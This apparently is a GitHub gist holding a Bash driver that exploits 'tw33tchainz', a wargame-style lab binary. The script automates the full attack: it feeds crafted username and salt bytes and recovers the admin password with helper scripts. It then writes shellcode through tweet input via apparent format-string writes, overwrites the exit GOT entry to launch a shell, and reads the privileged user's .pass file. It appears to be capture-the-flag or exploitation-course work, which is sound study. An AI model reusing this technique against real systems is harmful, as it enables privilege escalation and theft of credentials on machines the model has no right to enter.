Bash driver to exploit tw33tchainz
input_file="inputs" | |
debug_file="debug" | |
# nuke that shit | |
rm $input_file | |
rm $debug_file | |
touch $input_file | |
touch $debug_file | |
binary="/levels/project1/tw33tchainz" | |
shellCode="/tmp/bleached/project1/binsh.hex" | |
# in bytes "" <- hand quotes | |
shellCodeSize=$(cat $shellCode | wc -w) | |
stepsSinceExit=999 | |
# program state constants | |
programState=0 | |
numTweets=0 | |
WAIT=999 | |
GET_PASS=1000 | |
GET_ADMIN=1001 | |
WRITE_SHELL=1002 | |
WRITE_EXIT=1003 | |
writeAddr="0x0804c0c1" | |
exitAddr="0x0804c038" | |
writeAddrValues=$(echo $writeAddr | perl -pe "s/..(..)(..)(..)(..)/\4 \3 \2 \1/") | |
input() { | |
printf "$1" "$2" >> $input_file | |
printf "$1" "$2" >> debug | |
} | |
tail -f $input_file | $binary | while read output | |
do | |
# filter the asni colors and clears | |
output="$(echo "$output" | sed "s,\x1B\[[0-9;]*[a-zA-Z],,g")" | |
echo "$output" | |
case "$programState" in | |
$GET_PASS) | |
genpass="$output" | |
password="$(python decode_pass.py $genpass)" | |
programState=$GET_ADMIN | |
;; | |
$GET_ADMIN) | |
if [ "$stepsSinceExit" == "1" ] | |
then | |
input "3\n" | |
input "%s\n" "$password" | |
programState=$WRITE_SHELL | |
fi | |
;; | |
$WRITE_SHELL) | |
# Since we're admin now it's 2 steps away | |
if [ "$stepsSinceExit" == "2" ] | |
then | |
input "1\n" | |
hexVal=$(cat $shellCode | cut -d' ' -f$(($numTweets+1))) | |
tweet=$(python get_tweet.py $writeAddr $numTweets $hexVal) | |
tsize=$(echo $tweet | wc -c) | |
input "%s\n" "$tweet" | |
numTweets=$(($numTweets+1)) | |
if [ ! $numTweets -lt $shellCodeSize ] | |
then | |
programState=$WRITE_EXIT | |
numTweets=0 | |
fi | |
fi | |
;; | |
$WRITE_EXIT) | |
if [ "$stepsSinceExit" == "2" ] | |
then | |
input "1\n" | |
hexVal=$(echo $writeAddrValues | cut -d' ' -f$(($numTweets+1))) | |
tweet=$(python get_tweet.py $exitAddr $numTweets $hexVal) | |
input "%s\n" "$tweet" | |
numTweets=$(($numTweets+1)) | |
if [ ! $numTweets -lt 4 ] | |
then | |
programState=$EXIT | |
numTweets=0 | |
fi | |
fi | |
;; | |
$EXIT) | |
if [ "$stepsSinceExit" == "2" ] | |
then | |
input "5\n" | |
# wait for the shell to fire up | |
sleep 1 | |
input "cat /home/project1_priv/.pass\n" | |
programState=$WAIT | |
fi | |
;; | |
*) | |
#Do nothing | |
;; | |
esac | |
case "$output" in | |
"Enter Username:") | |
input "%s" "$(python -c "print '\x01'*15")" | |
;; | |
"Enter Salt:") | |
input "%s" "$(python -c "print '\xff'*15")" | |
;; | |
"Generated Password:") | |
programState=$GET_PASS | |
input "\n" | |
;; | |
"5: Exit"*) | |
stepsSinceExit=0 | |
;; | |
*) | |
#Do nothing | |
;; | |
esac | |
stepsSinceExit=$(($stepsSinceExit + 1)) | |
done |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment